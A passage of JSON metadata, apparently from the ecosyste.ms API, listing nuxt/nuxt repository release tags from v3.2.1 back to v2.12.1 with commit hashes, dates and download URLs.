yste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27